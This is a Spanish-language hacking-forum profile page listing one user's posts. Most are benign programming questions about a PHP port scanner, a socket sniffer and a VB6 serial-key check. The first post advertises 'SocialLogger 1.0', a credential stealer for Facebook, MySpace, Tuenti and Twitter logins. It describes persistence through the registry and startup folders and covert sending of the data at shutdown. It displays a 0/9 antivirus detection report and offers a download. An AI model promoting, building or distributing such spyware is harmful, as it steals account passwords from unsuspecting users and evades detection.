elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Mensajes
Páginas: [1] 2
1  Seguridad Informática / Bugs y Exploits / SocialLogger 1.0 BETA en: 12 Marzo 2012, 17:46 pm
SocialLogger 1.0



Aplicación que sirve para obtener los datos introducidos en la página de inicio de sesión de algunas de las redes sociales más famosas (Faceebok, MySpace, Tuenti y Twitter).

¿Qué hace y cómo funciona?
[/font][/size][/color]

La aplicación comprueba si ya se está ejecutando. De ser así, se cierra automáticamente para evitar problemas. Si el usuario creador del programa que va a capturar los datos introducidos ha seleccionado la opción de Iniciar con Windows, la aplicación comprueba si ha sido ejecutada anteriormente. Después, si no ha sido ejecutada anteriormente, verifica la existencia de ciertos directorios (dependiendo de si está corriendo bajo Windows XP, Vista o 7) y se copia en ellos. Se añade en el registro y por último está a la espera de avistar las diferentes páginas de inicio de sesión de estas redes en cualquiera de los siguientes navegadores: Internet Explorer, Mozilla Firefox y Google Chrome (que son los más usados según mi opinión). Al terminar el usuario de usar el PC, lo más normal es que lo apague, pues al apagarlo es cuando se envían automáticamente (y sin que el usuario se entere) los datos recogidos por esta aplicación.


File Info

Report date: 2012-03-11 13:15:35 (GMT 1)
File name: stub-dll
File size: 53248 bytes
MD5 Hash: f8f92ebfab9737b668ad5bd2e4c6a341
SHA1 Hash: 91139add152f83499e4a313d45a75e9b8a5c1836
Detection rate: 0 on 9 (0%)
Status: CLEAN

Detections

Avast -
AVG -
Avira AntiVir -
ClamAV -
Comodo -
Emsisoft -
F-Prot -
Ikarus -
TrendMicro -

Scan report generated by
NoVirusThanks.org


SE ADMITEN PROPUESTAS PARA MEJORAR LA APLICACIÓN!!! ;)


DESCARGAR
2  Programación / Programación Visual Basic / Detectar sockets en: 13 Octubre 2011, 16:44 pm
Quisiera saber como puedo hacer una especie de sniffer que detecte los sockets que envia y recible cierta aplicación (ejemplo.exe)...
Alguna sugerencia?
Gracias de antemano.
Saludos.
3  Programación / PHP / Re: Escaner de puertos online en: 6 Octubre 2011, 15:28 pm
jajajajja ha hecho los deberes eh jajaja
4  Programación / PHP / Re: Escaner de puertos online en: 5 Octubre 2011, 19:56 pm
enfin....


ya he dado con la solución, solo tengo que abrir una conexión mediante sockets a un servidor y con un if indicar si el puerto está abierto o cerrado.
Código:
stream_socket_client("tcp://IP/WEB:PUERTO", $errno, $errstr, 30);

Gracias.
Saludos.
5  Programación / PHP / Re: Escaner de puertos online en: 5 Octubre 2011, 19:07 pm
http://infrangelux.sytes.net/ScanX/#

eso es lo que yo busco :)
6  Programación / PHP / Re: Escaner de puertos online en: 5 Octubre 2011, 18:49 pm
mm no me sirve..
aver, yo tengo un programa escuchando en el puerto 81 y al usar el scanner de http://www.internautas.org/w-scanonline.php me sale que tengo el puerto abierto, pero con los demás escanners que he encontrado en Google en PHP, me dice que está cerrado cuando esto no es así...
me explico?
7  Programación / PHP / Re: Escaner de puertos online en: 5 Octubre 2011, 17:28 pm
lo que quiero es el código fuente de un TCP/IP port escanner
suena de algo? .. gracias
8  Programación / PHP / Escaner de puertos online en: 5 Octubre 2011, 16:13 pm
Hola quisiera saber cómo hacer un escaner de puertos de este tipo:
Código:
http://www.internautas.org/w-scanonline.php

he probado con muchos escaners pero ninguno me da resultado excepto ese sistema.

Alguna sugerencia?
Saludos.
9  Programación / Programación Visual Basic / Re: Sistema de seguridad "anticopias" vb6 en: 4 Octubre 2011, 19:33 pm
Vale vale, he creado un sistema que usa el número de serie del disco duro donde esté instalado el sistema operativo en uso y el serial que el usuario debería introducir sería el siguiente:

Numero de serie de la unidad: DriveNum
Serial que el usuario debe introducir para iniciar la aplicación: DriveNum + 123

Supongamos que el número de serie de la unidad es: 12345678111. Pues el usuario debería introducir en un campo de texto el serial: 12345678111 + 123 = 12345678234 para que la aplicación inicie.
Esto lo compruebo con el código:
Código:
if text1.text = DriveNum + 123 then
me.enabled=true
else
msgbox "Serial incorrecto"
end if

Pero he averiguado que esto es muy facil de crackear (hasta yo he podido con OllyDBG)... Mi pregunta es: ¿Cómo hago para que esto sea más dificil de crackear?

Saludos y gracias x la respuesta.
10  Programación / Programación Visual Basic / Sistema de seguridad "anticopias" vb6 en: 4 Octubre 2011, 16:01 pm
Hola! estoy desarrollando mi propio Software de pago y quisiera saber qué métodos me recomendarían para evitar el pirateo de mi aplicación.

Había pensado que tal vez MySQL sería una buena idea...

Alguna sugerencia¿
Saludos.
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines